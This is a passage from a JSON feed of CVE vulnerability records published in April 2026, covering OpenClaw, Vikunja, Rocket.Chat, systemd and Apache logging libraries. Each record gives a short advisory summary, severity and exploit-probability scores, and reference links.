commands.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":2.3,"epss":0.00027,"ranking_epss":0.0764,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2","https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564","https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35649","summary":"OpenClaw before 2026.3.22 contains a settings reconciliation vulnerability that allows attackers to bypass intended deny-all revocations by exploiting empty allowlist handling. The vulnerability treats explicit empty allowlists as unset during reconciliation, silently undoing intended access control denials and restoring previously revoked permissions.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.3,"epss":0.00023,"ranking_epss":0.06179,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378","https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35650","summary":"OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed override keys that slip through inconsistent validation to execute arbitrary code with unintended environment variables.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":7.7,"epss":0.00063,"ranking_epss":0.19476,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232","https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg","https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35651","summary":"OpenClaw versions 2026.2.13 through 2026.3.24 contain an ANSI escape sequence injection vulnerability in approval prompts that allows attackers to spoof terminal output. Untrusted tool metadata can carry ANSI control sequences into approval prompts and permission logs, enabling attackers to manipulate displayed information through malicious tool titles.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07965,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60","https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7","https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35652","summary":"OpenClaw before 2026.3.22 contains an authorization bypass vulnerability in interactive callback dispatch that allows non-allowlisted senders to execute action handlers. Attackers can bypass sender authorization checks by dispatching callbacks before normal security validation completes, enabling unauthorized actions.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.9,"epss":0.00044,"ranking_epss":0.13281,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6","https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35619","summary":"OpenClaw before 2026.3.24 contains an authorization bypass vulnerability in the HTTP /v1/models endpoint that fails to enforce operator read scope requirements. Attackers with only operator.approvals scope can enumerate gateway model metadata through the HTTP compatibility route, bypassing the stricter WebSocket RPC authorization checks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07746,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501","https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35620","summary":"OpenClaw before 2026.3.24 contains missing authorization vulnerabilities in the /send and /allowlist chat command handlers. The /send command allows non-owner command-authorized senders to change owner-only session delivery policy settings, and the /allowlist mutating commands fail to enforce operator.admin scope. Attackers with operator.write scope can invoke /send on|off|inherit to persistently mutate the current session's sendPolicy, and execute /allowlist add commands to modify config-backed allowFrom entries and pairing-store allowlist entries without proper admin authorization.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":5.3,"epss":0.00055,"ranking_epss":0.17273,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b","https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35","https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789","https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83","https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35621","summary":"OpenClaw before 2026.3.24 contains a privilege escalation vulnerability where the /allowlist command fails to re-validate gateway client scopes for internal callers, allowing operator.write-scoped clients to mutate channel authorization policy. Attackers can exploit chat.send to build an internal command-authorized context and persist channel allowFrom and groupAllowFrom policy changes reserved for operator.admin scope.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00029,"ranking_epss":0.08232,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35641","summary":"OpenClaw before 2026.3.24 contains an arbitrary code execution vulnerability in local plugin and hook installation that allows attackers to execute malicious code by crafting a .npmrc file with a git executable override. During npm install execution in the staged package directory, attackers can leverage git dependencies to trigger execution of arbitrary programs specified in the attacker-controlled .npmrc configuration file.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.4,"epss":6e-05,"ranking_epss":0.00375,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw","https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation","https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35643","summary":"OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application context.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.6,"epss":0.00039,"ranking_epss":0.11446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5","https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg","https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35596","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the hasAccessToLabel function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed. This vulnerability is fixed in 2.3.0.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07339,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/fc216c38afaa51dd56dde7a97343d2148ecf24c1","https://github.com/go-vikunja/vikunja/pull/2578","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-hj5c-mhh2-g7jq"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35597","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the TOTP failed-attempt lockout mechanism is non-functional due to a database transaction handling bug. When a TOTP validation fails, the login handler in pkg/routes/api/v1/login.go calls HandleFailedTOTPAuth and then unconditionally rolls back. HandleFailedTOTPAuth in pkg/user/totp.go uses an in-memory counter (key-value store) to track failed attempts. When the counter reaches 10, it calls user.SetStatus(s, StatusAccountLocked) on the same database session s. Because the login handler always rolls back after a TOTP failure, the StatusAccountLocked write is undone. The in-memory counter correctly increments past 10, so the lockout code executes on every subsequent attempt, but the database write is rolled back every time. This allows unlimited brute-force attempts against TOTP codes. This vulnerability is fixed in 2.3.0.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08848,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/6ca0151d02fa0e8c7e2181ab916a28e08caaaec8","https://github.com/go-vikunja/vikunja/pull/2576","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-fgfv-pv97-6cmj","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-fgfv-pv97-6cmj"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35598","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance. This vulnerability is fixed in 2.3.0.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07339,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/879462d717351fe5d276ddec5246bdec31b41661","https://github.com/go-vikunja/vikunja/pull/2579","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35599","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task's RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12357,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b","https://github.com/go-vikunja/vikunja/pull/2577","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35600","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails. This vulnerability is fixed in 2.3.0.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64","https://github.com/go-vikunja/vikunja/pull/2580","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35601","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV output generator builds iCalendar VTODO entries via raw string concatenation without applying RFC 5545 TEXT value escaping. User-controlled task titles containing CRLF characters break the iCalendar property boundary, allowing injection of arbitrary iCalendar properties such as ATTACH, VALARM, or ORGANIZER. This vulnerability is fixed in 2.3.0.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07909,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/pull/2580","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35602","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the Vikunja file import endpoint uses the attacker-controlled Size field from the JSON metadata inside the import zip instead of the actual decompressed file content length for the file size enforcement check. By setting Size to 0 in the JSON while including large compressed file entries in the zip, an attacker bypasses the configured maximum file size limit. This vulnerability is fixed in 2.3.0.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10733,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/pull/2575","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-qh78-rvg3-cv54","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-qh78-rvg3-cv54"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35595","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain. When a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project. This vulnerability is fixed in 2.3.0.","cvss":8.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.3,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07976,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/c03d682f48aff890eeb3c8b41d38226069722827","https://github.com/go-vikunja/vikunja/pull/2583","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2vq4-854f-5c72"],"published_time":"2026-04-10T17:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22560","summary":"An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 allows users to be redirected to arbitrary URLs by manipulating parameters within a SAML endpoint.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04065,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/RocketChat/Rocket.Chat/pull/38994","https://hackerone.com/reports/3418031"],"published_time":"2026-04-10T17:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40224","summary":"In systemd 259 before 260, there is local privilege escalation in systemd-machined because varlink can be used to reach the root namespace.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01622,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-6pwp-j5vg-5j6m"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40225","summary":"In udev in systemd before 260, local root execution can occur via malicious hardware devices and unsanitized kernel output.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05138,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-vpfq-8p5f-jcqx"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40226","summary":"In nspawn in systemd 233 through 259 before 260, an escape-to-host action can occur via a crafted optional config file.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00371,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-9mj4-rrc3-gjcx"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40227","summary":"In systemd 260 before 261, a local unprivileged user can trigger an assert via an IPC API call with an array or map that has a null element.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04332,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-848h-497j-8vjq"],"published_time":"2026-04-10T16:16:33","vendor":"systemd_project","product":"systemd","version":null},{"cve_id":"CVE-2026-40228","summary":"In systemd 259, systemd-journald can send ANSI escape sequences to the terminals of arbitrary users when a \"logger -p emerg\" command is executed, if ForwardToWall=yes is set.","cvss":2.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.9,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01851,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.openwall.com/lists/oss-security/2026/04/08/1"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35594","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, Vikunja's link share authentication (GetLinkShareFromClaims in pkg/models/link_sharing.go) constructs authorization objects entirely from JWT claims without any server-side database validation. When a project owner deletes a link share or downgrades its permissions, all previously issued JWTs continue to grant the original permission level for up to 72 hours (the default service.jwtttl). This vulnerability is fixed in 2.3.0.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11202,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/379d8a5c19334ffe4846003f590e202c31a75479","https://github.com/go-vikunja/vikunja/pull/2581","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-96q5-xm3p-7m84","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-96q5-xm3p-7m84"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40021","summary":"Apache Log4net's  XmlLayout https://logging.apache.org/log4net/manual/configuration/layouts.html#layout-list  and  XmlLayoutSchemaLog4J https://logging.apache.org/log4net/manual/configuration/layouts.html#layout-list , in versions before 3.3.0, fail to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  in MDC property keys and values, as well as the identity field that may carry attacker-influenced data. This causes an exception during serialization and the silent loss of the affected log event.\n\nAn attacker who can influence any of these fields can exploit this to suppress individual log records, impairing audit trails and detection of malicious activity.\n\nUsers are advised to upgrade to Apache Log4net 3.3.0, which fixes this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4net/pull/280","https://lists.apache.org/thread/q8otftjswhk69n3kxslqg7cobr0x4st7","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4net/manual/configuration/layouts.html","https://logging.apache.org/security.html#CVE-2026-40021","http://www.openwall.com/lists/oss-security/2026/04/10/11"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40023","summary":"Apache Log4cxx's  XMLLayout https://logging.apache.org/log4cxx/1.7.0/classlog4cxx_1_1xml_1_1XMLLayout.html , in versions before 1.7.0, fails to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  in log messages, NDC, and MDC property keys and values, producing invalid XML output. Conforming XML parsers must reject such documents with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nAn attacker who can influence logged data can exploit this to suppress individual log records, impairing audit trails and detection of malicious activity.\n\nUsers are advised to upgrade to Apache Log4cxx 1.7.0, which fixes this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4cxx/pull/609","https://lists.apache.org/thread/y15cv3zblg3dfwr5vy6ddbnl4zyrzr8b","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4cxx/1.7.0/classlog4cxx_1_1xml_1_1XMLLayout.html","https://logging.apache.org/security.html#CVE-2026-40023","http://www.openwall.com/lists/oss-security/2026/04/10/12"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40223","summary":"In systemd 258 before 260, a local unprivileged user can trigger an assert when a Delegate=yes and User=<unset> unit exists and is running.","cvss":4.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.7,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02048,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-x4h8-rrrg-q78f"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34478","summary":"Apache Log4j Core's  Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes.\n\nTwo distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly:\n\n  *  The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output.\n  *  The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping.\n\n\nUsers of the SyslogAppender are not affected, as its configuration attributes were not modified.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00145,"ranking_epss":0.34861,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4074","https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout","https://logging.apache.org/security.html#CVE-2026-34478","http://www.openwall.com/lists/oss-security/2026/04/10/7"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34479","summary":"The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nTwo groups of users are affected:\n\n  *  Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.\n  *  Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.\n\n\nUsers are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue.\n\nNote: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the  Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4078","https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html","https://logging.apache.org/security.html#CVE-2026-34479","http://www.openwall.com/lists/oss-security/2026/04/10/8"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34480","summary":"Apache Log4j Core's  XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  producing invalid XML output whenever a log message or MDC value contains such characters.\n\nThe impact depends on the StAX implementation in use:\n\n  *  JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records.\n  *  Alternative StAX implementations (e.g.,  Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger.\n\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4077","https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout","https://logging.apache.org/security.html#CVE-2026-34480","http://www.openwall.com/lists/oss-security/2026/04/10/9"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34481","summary":"Apache Log4j's  JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records.\n\nAn attacker can exploit this issue only if both of the following conditions are met:\n\n  *  The application uses JsonTemplateLayout.\n  *  The application logs a MapMessage containing an attacker-controlled floating-point value.\n\n\nUsers are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4080","https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/json-template-layout.html","https://logging.apache.org/security.html#CVE-2026-34481","http://www.openwall.com/lists/oss-security/2026/04/10/10"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34727","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT token without checking whether the matched user has TOTP two-factor authentication enabled. When a local user with TOTP enrolled is matched via the OIDC email fallback mechanism, the second factor is completely skipped. This vulnerability is fixed in 